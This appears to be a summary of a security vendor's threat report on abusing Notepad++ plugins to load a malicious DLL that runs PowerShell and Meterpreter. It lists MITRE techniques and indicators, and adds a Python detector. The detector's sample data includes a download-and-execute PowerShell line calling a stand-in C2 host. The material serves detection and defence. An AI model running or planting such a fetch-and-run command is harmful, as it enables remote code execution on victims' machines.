THREAT ANALYSIS REPORT: Abusing Notepad++ Plugins for Evasion and Persistence

Cybereason GSOC analysts detail a technique that uses Notepad++ plugins to persist and evade security controls, including how a malicious DLL is injected via the plugin loading process and how PowerShell and Meterpreter are used to establish C2. The report also covers detection and prevention guidance and notes that Cybereason MDR can detect and block such infections. #Notepad++ #StrongPity #PROMETHIUM #Meterpreter #PowerShell

Keypoints

  • Notepad++ is widely used, expanding the potential attack surface: because Notepad++ is installed across many IT environments, abuse of its plugin mechanism has broad exposure.
  • Threat actors have already abused Notepad++: APT groups like StrongPity have leveraged Notepad++ to deploy backdoors and persist on victims’ machines.
  • Notepad++ plugins can be abused for persistence and evasion: The plugin mechanism can be leveraged to load malicious DLLs and bypass defenses.
  • No verification for locally installed plugins: Local administrators can inject malicious DLLs into the loading process due to the lack of a plugin verification step.
  • Detection and prevention by Cybereason MDR: The Cybereason Defense Platform detects and prevents infections stemming from malicious Notepad++ plugins.
  • Attack chain details: Abuse of the SCI_ADDTEXT API triggers a Notepad++ command; the plugin DLL then loads a PowerShell-based Meterpreter payload, which can escalate privileges and establish C2 communications.
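One defender-side check that follows from the attack chain above (a plugin DLL launching PowerShell with a Base64-encoded command), as an added Python example that is not part of the Cybereason report: it flags PowerShell children of notepad++.exe in constructed Sysmon-style process-creation events and decodes the -EncodedCommand blob for triage. The event field names, paths and sample payload are assumptions made for this example.

```python
import base64
import binascii
import re

# Constructed Sysmon-style process-creation events (ParentImage, Image, CommandLine);
# sample data written for this example, not taken from the report.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": "notepad++.exe notes.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File build.ps1"},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE text), or None."""
    for flag, blob in _ENC_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -ExecutionPolicy, which is not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue
    return None

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Flag PowerShell launched by notepad++.exe. This is rare in normal use (the Run
    menu or a scripting plugin can do it), so the decoded command line drives triage."""
    alerts = []
    for ev in events:
        if _basename(ev["ParentImage"]) != "notepad++.exe":
            continue
        if _basename(ev["Image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        alerts.append({"rule": "notepad++.exe spawned PowerShell",
                       "command_line": ev["CommandLine"],
                       "decoded_payload": decode_encoded_command(ev["CommandLine"])})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["rule"], "->", alert["decoded_payload"])
```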

MITRE Techniques

  • [T1574.001] DLL Search Order Hijacking – The Notepad++ plugin loading mechanism is abused to inject a malicious DLL into the loading process (e.g., “Malicious DLL dropped into the plugin directory”).
  • [T1027.001] Obfuscated/Compressed Files and Information – A Base64-encoded PowerShell command is used as part of the payload (e.g., “Base64 encoded PowerShell command”).
  • [T1059.001] PowerShell – PowerShell is used to execute the Meterpreter payload after the DLL loads (e.g., “PowerShell command embedded in malicious DLL”).
  • [T1056.001] Keylogging – The backdoor is described as capable of installing a keylogger on the victim machine (e.g., “install a keylogger on the machine”).
  • [T1068] Privilege Escalation – GetSystem is used to escalate from a regular user to SYSTEM (e.g., “Successfully escalated to SYSTEM”).
  • [T1071.001] Web Protocols – The Meterpreter payload communicates with a C2 server to send output and maintain a session (e.g., “Established Meterpreter session” and “C2 server to send the output of this software”).
  • Quoted content references from the article are included to illustrate the technique usage, paraphrased in English as necessary.

Indicators of Compromise

  • [File Hash] Npp_Persistence_Plugin.dll – SHA256: 90BC7FA90705148D8FFEEF9C3D55F349611905D3F7A4AD17B956CD7EE7A208AF
  • [File Name] Npp_Persistence_Plugin.dll – Malicious DLL used as the Notepad++ plugin
  • [Encoded Payload] Base64-encoded PowerShell command used by the Notepad++ plugin payload to contact the C2 server (decoding the payload reveals the C2 activity)

Read more: https://www.cybereason.com/blog/threat-analysis-report-abusing-notepad-plugins-for-evasion-and-persistence